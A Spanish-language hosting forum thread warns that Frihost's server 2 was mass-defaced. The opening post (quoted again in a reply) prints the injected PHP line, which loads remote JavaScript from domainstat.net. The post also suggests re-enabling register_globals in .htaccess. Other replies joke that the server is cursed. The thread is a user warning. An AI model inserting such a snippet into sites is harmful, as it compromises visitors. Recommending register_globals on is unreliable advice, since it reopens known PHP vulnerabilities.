FRIHOSTFORUMSSEARCHFAQTOSBLOGSDIRECTORY
You are invited to Log in or Register a Frihost Account!

[NEWS]Sever 2 hackeado... IMPORTANTE

eugenioclrc
Hola, algunos de ustedes probablemente esten teniendo problemas en sus sitios... esta es la razon; http://www.frihost.com/forums/vt-34504.html

Al parececer hay un gusano / hacker que esta haciendo un deface masivo.
Lo mas comun es que agregue el sig codido a sus archivos con modo 777;

Code:
<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?>

Por ello mismo desactivaron las variables globales, por lo que algunas scripts no funcionaran, para activar las variables globales agreguen la siguiente linea en su .htaccess

Code:
php_flag register_globals on

o pueden modificar sus scripts y las variables enviadas por formulario en vez de usarlas tipo $variable usen $_POST['variable'] o $_GET['variable'] si es enviada de la forma tipo algo.php?variable=cualquiercosa

Saludos, Eugenio
Caxius
otra vez?
Shocked Shocked Shocked
nos ha jodido mayo... ainssssssssssssssssssssssssssssssssss Confused
risuarez
Se dan cuenta!!!!!!! y despues dicen que son babosadas mias!!!! El server 2 esta maldito. Ahora estoy mucho mas convencido. Es mas, tengo ganas de que llamemos a un medio para hacer una sesión espiritista!!!!
Caxius
risuarez wrote:
Se dan cuenta!!!!!!! y despues dicen que son babosadas mias!!!! El server 2 esta maldito

¬¬ no eches el farioooooooo!!!! que de aqui a dos o tres dias veo esto plagado de topic en plan "porque no funciona mi host"???
¬¬ Evil or Very Mad

Laughing Laughing
zorindart
¿No es precisamente esto lo que nos dicen que ES IMPOSIBLE que suceda en máquinas que corren bajo Linux?
Yo tengo alguno de mis directorios protegidos mediante htaccess, e incluso en éstos se ha colado el hacker en cuestión, al parecer sin ningún problema.
A ver si al final que todo esto de la seguridad de Linux no es más que propaganda...
sindemencia
eugenioclrc wrote:
Hola, algunos de ustedes probablemente esten teniendo problemas en sus sitios... esta es la razon; http://www.frihost.com/forums/vt-34504.html

Al parececer hay un gusano / hacker que esta haciendo un deface masivo.
Lo mas comun es que agregue el sig codido a sus archivos con modo 777;

Code:
<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?>

Por ello mismo desactivaron las variables globales, por lo que algunas scripts no funcionaran, para activar las variables globales agreguen la siguiente linea en su .htaccess

Code:
php_flag register_globals on

o pueden modificar sus scripts y las variables enviadas por formulario en vez de usarlas tipo $variable usen $_POST['variable'] o $_GET['variable'] si es enviada de la forma tipo algo.php?variable=cualquiercosa

Saludos, Eugenio

serios problemas con el server 2 presisamente no podia hacer andar mi phpalbum Smile ya veo por q ... muchas gracias (mi pagina esta en el host 2 Neutral pero noi se me ah cerrado Smile )
anticitizen1
yo la verdad no creo que el server2 este maldito.
quizas menos estable que el 1 nada mas. crep que se tomaron muhco tiempo en pasar "register_globals" a off.
Mi sitio funciona bien, se experiementa problemas pero creo que es mas por la carga de transacciones, memoria etc.

EDIT 30 segundos despues de escribir mi rta, el server 2 fue reiniciaco y los problemas terminan.

Ademas debe estar claro que no estamos hospedados en un XEON DUAL
La maquina funciona bien y creo que en algunas oportunidades supera sus limitaciones.
risuarez
Si esta maldito!!!!! no te parece extraño y demasiada coincidencia de que casi con exactitud cada dos semanas presenta una nueva falla!!!! has la prueba y pon atención y veras!!!!
anticitizen1
veremos a ver.. si en dos semanas vuelve a ocurrir algo,
empezare a creer que alguien le esta haciendo vudù al server.
Reiji
Increíble...primera vez que escucho esto en FH.
Jaime
Ese servidor dos como que está en el Hotel California...